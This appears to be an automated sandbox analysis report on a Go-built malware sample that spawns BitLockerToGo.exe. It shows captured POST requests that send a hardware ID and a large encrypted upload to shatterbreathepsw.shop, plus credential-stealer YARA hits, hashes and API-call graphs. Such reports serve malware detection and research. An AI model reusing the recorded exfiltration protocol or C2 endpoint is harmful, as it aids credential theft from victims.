                                                            2024-05-02 15:04:32 UTC804INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=mppi8fgkujg3u98lrlvhquncq2; expires=Mon, 26-Aug-2024 08:51:11 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DT9jtVdfuOMusrq3jQU2w%2BJYGxLjlr1WpVjEx0kF2kh8ufP4h3SPjJq4mSJqj5l5USYmptu12KO6vwDjIfpi99wfaluPLm2cFG98hKkVITKpbK28KsbnLZVtGleJ4CbKA10Dg%2F679B7%2F"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e781ed9c8c8f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 15:04:32 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
                                                            Data Ascii: 11ok 191.96.150.225
                                                            2024-05-02 15:04:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.649724104.21.95.194437060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 15:04:33 UTC287OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1365
                                                            Host: shatterbreathepsw.shop
                                                            2024-05-02 15:04:33 UTC1365OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
                                                            2024-05-02 15:04:33 UTC806INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=ctu4ugf4a7528lok83o4mo3fje; expires=Mon, 26-Aug-2024 08:51:12 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F6oS%2F4xU%2BB9GmpUB7jLfsYDbMU1vfBqTVWhSt0Sosqa4EjSRIN%2F2yjLoQThLsqyN6lxp2nXe1gmm0oHTfZbhs2sfiABDohtQJmZiWx0fSKO5kLjhTQkNZRadxfJsMsBSoGEZQ0c7rLcW"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e786bd550c7a-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 15:04:33 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
                                                            Data Ascii: 11ok 191.96.150.225
                                                            2024-05-02 15:04:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.649726104.21.95.194437060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 15:04:34 UTC289OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 556486
                                                            Host: shatterbreathepsw.shop
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 48 88 1f cc 28 ec 0f 92 da 61 9a ed 1b 6c 1f 76 7f a9 29 7a c9 54 12 91 22 a4 60 8c 93 7e 7b 78 4c f9 57 58 40 74 e6 f3 c4 99 89 06 17 74 4b 85 cd d1 d4 9d 81 1b 63 57 8c b4 d6 af 9b 9b b6 a1 c4 9d 07 cd 69 b8 ab c6 0e aa ca cc 6f 2e 05 4d d2 92 b3 1a a4 f9 9e 26 31 15 29 5e a6 91 c5 07 99 55 4e e5 32 7a 2e 69 ab 93 1e fa 97 6c 59 53 93 05 26 6c 8d 50 c6 5f 21 f2 36 ba f9 31 04 d7 43 35 0a f8 23 ad 70 a9 d7 af ec f8 d6 8b 57 ab fd 37 56 41 c6 01 7a e8 38 ea ae 1e 43 54 0c 1d 23 a9 c3 d0 62 c9 96 75 42 9c 11 5d 47 a1 1a 15 86 7d 1e bb 33 fe 28 3d 06 62 94 f2 78 0d 97 41 b7 d2 1e 05 90 ad bd 7c e4 37 c0 38 f6 1a cf 14 24 cc c9 bc b6 9f f8 ab bf ce 7f 14 b5 b4 c3 c7 04 4d 4f 76 bb f1 62 30 db 5d e8 dc 3f 09 a5 eb 8f 23 32 af d5 84 b6 f5 5d 93 79 37 78 61 7d
                                                            Data Ascii: H(alv)zT"`~{xLWX@ttKcWio.M&1)^UN2z.ilYS&lP_!61C5#pW7VAz8CT#buB]G}3(=bxA|78$MOvb0]?#2]y7xa}
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 4d d4 a5 70 9f 3b db 41 8f d2 97 04 3e 24 57 61 87 76 7b 74 a2 26 df 72 56 0d 60 74 d6 d1 99 5b 16 a4 1a b4 5c cf 93 87 b6 53 a0 f5 62 b3 80 60 95 79 56 86 f6 0f c5 14 83 6d bc f8 3a 77 4b 79 b8 8d 79 f9 2b 2e d9 44 72 6d dc a5 a0 21 08 d5 a4 69 dd 46 bc 22 78 d0 e9 54 79 50 fc e2 51 05 73 4b 8e ac 4f d6 6f fa 08 c0 9d da de ac b5 ff 8c 2e 75 bf ed 16 36 22 da 33 57 f2 f6 40 dd c6 a0 4f 0f 85 db 4f 39 b9 54 1b e9 06 53 05 40 69 c3 77 f7 9e 25 d7 e0 d3 11 9f de 67 3e 76 e7 ce da f7 54 74 99 1a 71 3f f4 6b d9 bc 7e cb da 58 a3 bc 99 7d 5f 19 d0 7c 23 7a 55 bb f7 db 09 0d 34 c5 0f d0 62 e9 69 22 f5 10 44 9a be 71 3d 5a 2f 7a 6b a5 43 97 35 05 31 b0 22 c3 75 23 7c a0 de 04 00 56 df 5d 08 56 f9 60 e0 d5 04 18 b8 40 ad 1b 86 e0 fb 5b 04 b5 7d 01 e3 1c 4c 41 02
                                                            Data Ascii: Mp;A>$Wav{t&rV`t[\Sb`yVm:wKyy+.Drm!iF"xTyPQsKOo.u6"3W@OO9TS@iw%g>vTtq?k~X}_|#zU4bi"Dq=Z/zkC51"u#|V]V`@[}LA
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: a7 6a 27 3e 9a e2 1e 5d ab 2b 1a 82 b3 a4 99 cc ec fe 6a ab df a8 e9 4f 6a 9f 1c 8a 55 aa ef a1 19 f7 d8 38 58 00 4a e2 85 f3 a1 14 99 68 8c 20 35 c9 5b 24 13 62 c5 ad 15 ee e9 36 12 87 c9 2d 7b 1c 48 37 ae 88 ff 52 0c 7c c6 c6 2d 67 1e 4a 0f ae 8c 73 ff b2 5e 31 12 23 d8 fd 1b 2e 40 10 0e 36 4a a2 76 db a7 cd d0 5d ff 54 08 af 94 5d 9c cb 0f 29 ae c4 65 26 cd f9 7c ea 95 04 69 91 ff 6b 8d fa 7f 97 43 15 b6 83 69 2c ea 84 3f e8 be 62 b5 0b e4 68 61 5c 26 f9 40 c3 6a c0 55 85 6b 4c 19 75 ec e7 8e a6 b5 63 07 c1 61 fe 78 a9 08 37 c8 72 f1 55 5c 08 0a 3e e9 0f 42 fb 0f 47 bb 5c 33 65 50 f0 59 56 43 83 f3 0b 49 58 90 aa f0 c3 98 7b b4 d1 49 96 73 34 f1 2a 36 e4 63 a3 31 f3 85 75 72 c8 41 54 df 5b 74 01 3f d4 55 5c 04 86 7b ea 8c cb 37 c7 05 3c ae 6c 1e d2 02
                                                            Data Ascii: j'>]+jOjU8XJh 5[$b6-{H7R|-gJs^1#.@6Jv]T])e&|ikCi,?bha\&@jUkLucax7rU\>BG\3ePYVCIX{Is4*6c1urAT[t?U\{7<l
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: f7 e3 e0 7f 8c 55 41 bd e4 bc 48 5d d8 d3 38 2d f5 da d2 6c 97 36 c9 f8 e7 cc 24 ef 56 04 e0 d3 44 6c 75 d1 43 c4 22 46 9b d4 9d 52 d9 c8 89 3e 63 75 e0 5c 64 9b 4e d7 5e 3d 5a ea aa 48 77 d8 c5 fa 5e 65 fd 8f 4c 72 7e 38 07 2d 8c 42 6d 24 d0 43 ef 57 20 64 5a 00 35 2d ba 08 b1 4c ec de d0 a7 c3 3f 9c 98 6f 34 c2 86 bb 34 28 5b ba 66 da 27 0d 0d b2 f8 dd fb cb 6f 6f bc 14 a5 89 f0 db 00 3b 0c 4f 57 be ad ce 78 4a a6 08 24 d7 c9 46 1a d5 21 49 20 71 0c 75 6e eb e2 58 35 7a 3e be 54 23 1d be 23 bc f4 58 58 4d 2e d9 c2 36 23 01 27 2e b6 77 be 70 c7 36 6d 01 85 5b dc c9 f5 a7 b2 91 47 84 8d ab be ad 34 6a 05 ac 66 b6 b0 09 61 8d da 18 71 f0 ba 77 df 48 d6 94 04 f8 76 bf f1 10 96 1e 7c 8d 2a 2f bf 13 08 7e 45 8f 54 45 1a cb ab 0b ff 31 5c 25 c7 7b f1 78 4e c4
                                                            Data Ascii: UAH]8-l6$VDluC"FR>cu\dN^=ZHw^eLr~8-Bm$CW dZ5-L?o44([f'oo;OWxJ$F!I qunX5z>T##XXM.6#'.wp6m[G4jfaqwHv|*/~ETE1\%{xN
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 85 9c 45 3a b8 66 26 72 03 e0 c7 48 70 96 3b 26 bc 35 fd 9a 30 4d 3d b0 c5 49 74 6b 0a cc e6 a4 10 3a c6 f7 0e b4 a4 61 48 0a 03 d6 7d f4 c7 d2 9f 6e cd 0d 72 f3 db 4b 2c 8c a5 cd 10 5d 90 56 0e ce cb cf 8b 23 c8 86 9b 5d f3 6b 0c 20 f4 fa c6 16 b2 09 f6 b9 0c 31 b0 00 8e 4b ba 28 17 3e b4 6c c3 6a 6c 18 24 72 6c d6 32 51 8c af bd 6b 47 48 8e 9c 5b bc 16 af 8c 9e 59 44 c3 31 0f 75 21 b0 2f 15 68 a2 79 d3 95 d4 37 7e e1 64 1a f9 5c d4 69 0f 99 8c 62 4e 81 78 5a 44 d9 2c c3 74 77 a9 ca 6b 8d ee 9f d7 d1 28 30 b0 b8 da 74 04 66 c7 c0 9b fa 18 7e 70 9b 4c 7b f7 df 26 db 4d c0 a4 a9 01 cb 38 c7 fc 49 7f 3e e6 45 88 f1 17 55 17 03 ec f8 b0 5a 44 6f 4b 50 90 f9 30 e2 23 b2 2e a1 b8 43 e2 05 f2 78 fc 71 29 30 5d 0f 21 1a 56 0a 62 9c e8 85 1b f7 85 0f bc 72 c2 db
                                                            Data Ascii: E:f&rHp;&50M=Itk:aH}nrK,]V#]k 1K(>ljl$rl2QkGH[YD1u!/hy7~d\ibNxZD,twk(0tf~pL{&M8I>EUZDoKP0#.Cxq)0]!Vbr
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 4a dd f5 7d e8 cf 50 79 f1 52 40 45 0c 96 50 f6 a3 61 54 d4 54 cf 69 87 0c c9 18 6a 1a 68 7d 1c 37 0a 91 cd c8 d3 20 bf 91 f5 80 6a db f9 c6 12 b7 25 8e b8 be 33 45 83 89 8a 0a 7d 2d db aa 8f 46 2e 24 da 12 6c b5 ce 0c d4 5a 6b b9 44 ec 10 2d 3d c9 4c 42 6a fb 6a fa ff b6 83 c3 53 84 3c 86 32 bc d1 af 65 e9 01 7d 51 82 0b 3a 76 43 8f 3d e7 dd b4 2a b8 ef 3c 3f 01 3e 4f 5e 31 81 a2 3d e5 39 79 6e bb 2f e0 76 a4 d5 13 80 16 26 84 ef 35 11 3f ee 66 8b 30 92 2e 25 3e 30 e9 c5 1c f7 31 de 99 ba 6b f2 34 39 c5 47 fe b5 2f cf 11 98 61 73 34 49 bd ea f9 54 ed bb a2 85 ab 04 db 91 06 cd 5b a9 66 35 49 9b 89 7f 5f 30 23 6b 20 8a e6 5b 95 72 ec dc 80 79 9d 31 c2 64 70 4e 2d d3 e6 05 a3 43 34 87 f5 c0 c7 55 63 93 2e 62 3a 8d 3d 03 72 e6 4c 9b f1 97 cb e3 ea cc 10 66
                                                            Data Ascii: J}PyR@EPaTTijh}7 j%3E}-F.$lZkD-=LBjjS<2e}Q:vC=*<?>O^1=9yn/v&5?f0.%>01k49G/as4IT[f5I_0#k [ry1dpN-C4Uc.b:=rLf
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: cd 08 e6 9f ce e3 8f 2a 73 f4 54 44 cf 1d 2f d1 32 39 7f aa 9e 4c 16 42 f4 d6 d6 1e 05 8e 10 37 ff bc 3e c8 3a a9 cc dc de ed 29 25 33 d7 06 a5 78 89 68 fe 1b b6 1a 9e 9c e6 e7 aa d9 27 5b 64 f1 11 41 7e 84 86 25 11 62 d2 b9 c7 b4 db 25 bd 1e 85 fd 56 70 e0 45 0b 04 66 74 4d de 31 f1 cf 90 e5 bc 24 d1 aa 78 b4 e2 50 ce 1c fd ce 44 83 20 1b 35 f4 84 ad 87 ec f6 af 6c d1 d9 16 fa b3 5e 37 67 8e 91 e0 39 6e ea b4 5a 64 58 17 d6 7e 9c 84 30 d1 10 28 fa 4e 99 e9 24 6c 6a 64 66 44 32 dc 78 cd 9f 05 19 3e 2f b8 83 71 21 4c 7d a6 41 03 4d 10 fa 25 b7 93 79 c9 c2 f1 12 b3 16 5a fb de 7b 8c a5 6d 38 de 01 a4 64 04 5f 0b 25 2d 21 67 e5 6a d7 34 9a 44 d5 e5 68 e2 f2 11 7e d0 b0 30 51 91 a2 98 95 fe 38 04 e5 9e 29 00 27 19 80 4b 4b 85 4d a8 f7 9f e4 f7 59 65 f2 43 67
                                                            Data Ascii: *sTD/29LB7>:)%3xh'[dA~%b%VpEftM1$xPD 5l^7g9nZdX~0(N$ljdfD2x>/q!L}AM%yZ{m8d_%-!gj4Dh~0Q8)'KKMYeCg
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 9d a9 f3 0e d8 a9 57 d1 e8 fd 90 ee b1 f8 44 a1 8c d9 1d 66 93 09 8b 1a 5d d1 69 80 98 3e ab 59 01 15 c4 d2 31 8c 28 a4 9f e2 a8 b1 44 01 84 4d ab de 15 ef 05 a6 af f6 32 97 9e 1f 73 43 12 9f 79 e8 3d fc ab 08 4a 60 26 81 a8 31 01 47 0d 81 97 3c d8 cd b4 07 29 91 54 98 f3 ef 6d a3 ef 6e 22 65 83 c2 67 a1 85 2e 00 3b a2 0c 92 1c 1d 02 45 ae 61 01 b4 de 25 a6 67 a2 b0 e0 9e 1c b3 73 21 5c e3 a1 79 55 28 12 ab b8 de b5 69 1a 1d 89 8a 8a 8e 1a eb 98 87 ad 8c dd b3 b0 e8 20 4f 91 8c 56 e1 73 a6 d8 16 b3 03 87 53 af 0a 8a 83 47 27 19 c6 1a 02 97 d0 40 4e 69 fb 81 e8 e9 44 46 e2 71 52 1b a2 c1 fd 0e 56 b0 ef 05 47 14 24 16 81 96 2f 8c b5 d3 a0 1a 27 21 5d 96 ed 75 fd 70 cb 21 b6 09 34 ca b8 57 fa 90 a1 12 ad e3 5a 64 de 6b d9 61 39 f2 38 49 b4 03 36 e4 de 46 2d
                                                            Data Ascii: WDf]i>Y1(DM2sCy=J`&1G<)Tmn"eg.;Ea%gs!\yU(i OVsSG'@NiDFqRVG$/'!]up!4WZdka98I6F-
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 6f 68 d3 8b b9 3f c1 46 e3 dc 5f 4a 89 95 7b aa b8 1f 87 c7 d6 76 a0 51 1b b5 14 fa 70 38 85 3b 3b 37 4e 77 4b 6d a2 cd b3 e9 01 96 cc 21 65 14 b7 d1 9c 91 40 f9 5d 3b ec 31 b1 e0 37 16 ba f9 9d 33 b8 1e a4 12 e4 67 52 96 1b 20 3a 3b 25 42 ff f3 5e 1f 80 d2 43 29 0f 37 bf b8 d9 6f 11 2c 6e 93 53 78 7a 1c f4 bd bd b0 ee d7 fd 7f 87 bd 0e 40 19 41 0b bb c0 07 1c 39 14 41 95 b8 8a 6d d3 02 5b d9 6a 1b 45 47 da c4 b6 02 a1 a9 c2 98 b2 10 3e 1f 45 a7 0f 3a 17 c9 ef 30 94 96 3f 8f 69 64 be e7 16 5b cb 90 c9 57 82 cc ad 37 b9 ff 6e d9 1d d6 b6 a4 cc 67 e2 01 03 3e 94 ee af 77 23 05 26 fa ee d2 7f 82 1e 0b b2 1d a8 85 3b 9e 02 52 36 dc bd c3 b3 e6 a4 04 44 dd d6 f4 43 04 01 06 1e 85 7d d0 3f 5b 9b 1e 84 b0 41 01 67 46 ef ae 85 a2 00 be dc 0b 88 dd 33 de 18 94 fd
                                                            Data Ascii: oh?F_J{vQp8;;7NwKm!e@];173gR :;%B^C)7o,nSxz@A9Am[jEG>E:0?id[W7ng>w#&;R6DC}?[AgF3
                                                            2024-05-02 15:04:38 UTC810INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=ptg8e02pib4vtgtjp7sgs5cubd; expires=Mon, 26-Aug-2024 08:51:17 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMU0q03QIQGHx2dgSj%2F3ItNTTsrob9OdT40xFf2Hq2ZT9sMwqjs1LERRphdKCT1wXY4d5nXNW5LV6%2BQN6qr7gvuu8VQoztcorowvScwgP%2F2a%2BP%2BDyaWEQAV6a16JBlt%2Fd1wngeaL4YPp"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e7924ad32ee8-MEL
                                                            alt-svc: h3=":443"; ma=86400


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:17:03:56
                                                            Start date:02/05/2024
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x7ff679810000
                                                            File size:9'048'064 bytes
                                                            MD5 hash:7E37F8C945D005226870E60AA2BAEA93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Go lang
                                                            Yara matches:
                                                            • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2354687188.000000C000326000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:17:04:20
                                                            Start date:02/05/2024
                                                            Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            Imagebase:0xcb0000
                                                            File size:231'736 bytes
                                                            MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2483917008.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2532039828.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2483286988.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2531513795.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:15.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:23.5%
                                                              Total number of Nodes:306
                                                              Total number of Limit Nodes:10
                                                              execution_graph 11778 2d10352 11781 2d10340 11778->11781 11782 2d10618 11778->11782 11784 2d104ea 11778->11784 11787 2d103c0 11778->11787 11779 2d2c540 LdrInitializeThunk 11779->11781 11781->11778 11781->11779 11781->11781 11781->11784 11781->11787 11788 2d2c6b0 11781->11788 11796 2d2d090 11781->11796 11782->11787 11805 2d28e70 LdrInitializeThunk 11782->11805 11804 2d28e70 LdrInitializeThunk 11784->11804 11791 2d2c705 11788->11791 11789 2d2c76e 11794 2d2c87e 11789->11794 11807 2d26ad0 11789->11807 11791->11789 11806 2d28e70 LdrInitializeThunk 11791->11806 11793 2d2c7b1 11793->11794 11810 2d28e70 LdrInitializeThunk 11793->11810 11794->11781 11797 2d2d0b0 11796->11797 11797->11797 11799 2d2d19e 11797->11799 11811 2d28e70 LdrInitializeThunk 11797->11811 11798 2d26ad0 RtlAllocateHeap 11801 2d2d1e3 11798->11801 11799->11798 11803 2d2d2b2 11799->11803 11801->11803 11812 2d28e70 LdrInitializeThunk 11801->11812 11803->11781 11804->11782 11805->11787 11806->11789 11808 2d26b64 RtlAllocateHeap 11807->11808 11809 2d26b1e 11807->11809 11808->11793 11809->11808 11810->11794 11811->11799 11812->11803 11592 2d13fd5 11593 2d13ff0 11592->11593 11593->11593 11596 2d2bc60 11593->11596 11595 2d141cd 11598 2d2bc80 11596->11598 11597 2d2bdde 11597->11595 11598->11597 11600 2d28e70 LdrInitializeThunk 11598->11600 11600->11597 11601 2d042d5 11604 2cf9e70 11601->11604 11603 2d042e8 11605 2cf9e85 11604->11605 11607 2cf9ec1 11604->11607 11608 2d24c20 11605->11608 11607->11603 11609 2d24ce8 RtlExpandEnvironmentStrings 11608->11609 11610 2d24c99 11608->11610 11610->11609 11615 2d055c2 11616 2d055ce 11615->11616 11619 2d2be30 11616->11619 11618 2d05601 11620 2d2be50 11619->11620 11621 2d2bfbe 11620->11621 11623 2d28e70 LdrInitializeThunk 11620->11623 11621->11618 11623->11621 11822 2d0d343 11823 2d0d418 RtlExpandEnvironmentStrings 11822->11823 11824 2d0d3dd 11822->11824 11825 2d0d451 11823->11825 11824->11823 11826 2d0d461 RtlExpandEnvironmentStrings 11825->11826 11827 2d0d4dc 11826->11827 11827->11827 11828 2d2be30 LdrInitializeThunk 11827->11828 11831 2d0d5c2 11828->11831 11829 2d0d738 RtlExpandEnvironmentStrings 11829->11831 11830 2d0d789 RtlExpandEnvironmentStrings 11830->11831 11831->11829 11831->11830 11832 2d2be30 LdrInitializeThunk 11831->11832 11832->11831 11624 2d050c6 11625 2d0510b 11624->11625 11628 2d28e70 LdrInitializeThunk 11625->11628 11627 2d051a0 11628->11627 11833 2d16647 11834 2d16651 11833->11834 11834->11834 11835 2d16ace GetComputerNameExA 11834->11835 11837 2d16b47 11835->11837 11836 2d16bdb GetComputerNameExA 11838 2d16c5b 11836->11838 11837->11836 11837->11837 11839 2d03f46 11840 2d03f4c 11839->11840 11841 2cf9e70 RtlExpandEnvironmentStrings 11840->11841 11842 2d03f59 11841->11842 11843 2d28e4a 11844 2d26ad0 RtlAllocateHeap 11843->11844 11845 2d28e52 11844->11845 11629 2d0e3cb 11632 2d2c540 11629->11632 11634 2d2c560 11632->11634 11633 2d0e3e7 11634->11633 11636 2d28e70 LdrInitializeThunk 11634->11636 11636->11633 11637 2d04ece 11638 2d04ed8 11637->11638 11641 2d2c130 11638->11641 11642 2d2c185 11641->11642 11644 2d2c1fe 11642->11644 11647 2d28e70 LdrInitializeThunk 11642->11647 11643 2d04eec 11644->11643 11648 2d28e70 LdrInitializeThunk 11644->11648 11647->11644 11648->11643 11649 2d290cc 11651 2d290dd 11649->11651 11650 2d2913e 11651->11650 11653 2d28e70 LdrInitializeThunk 11651->11653 11653->11650 11654 2d289cd 11657 2d289e0 11654->11657 11655 2d28a8a LoadLibraryW 11656 2d28a91 11655->11656 11657->11655 11657->11657 11658 2d03ff6 11659 2d04000 11658->11659 11659->11659 11662 2d0aa10 11659->11662 11665 2d0ab20 11662->11665 11666 2d2bc60 LdrInitializeThunk 11665->11666 11667 2d0ab79 11666->11667 11846 2d05977 11847 2d0598c CryptUnprotectData 11846->11847 11848 2d2867a 11849 2d28724 LoadLibraryW 11848->11849 11850 2d286df 11848->11850 11851 2d2872b 11849->11851 11850->11849 11671 2d0b9ff 11672 2d0ba04 11671->11672 11676 2d0c0d0 11672->11676 11684 2d0fc30 11672->11684 11673 2d0ba34 11677 2d0c0e6 11676->11677 11679 2d0c1a0 11676->11679 11678 2d2bc60 LdrInitializeThunk 11677->11678 11677->11679 11680 2d0c282 11678->11680 11679->11673 11680->11679 11681 2d2c130 LdrInitializeThunk 11680->11681 11683 2d0c2a3 11681->11683 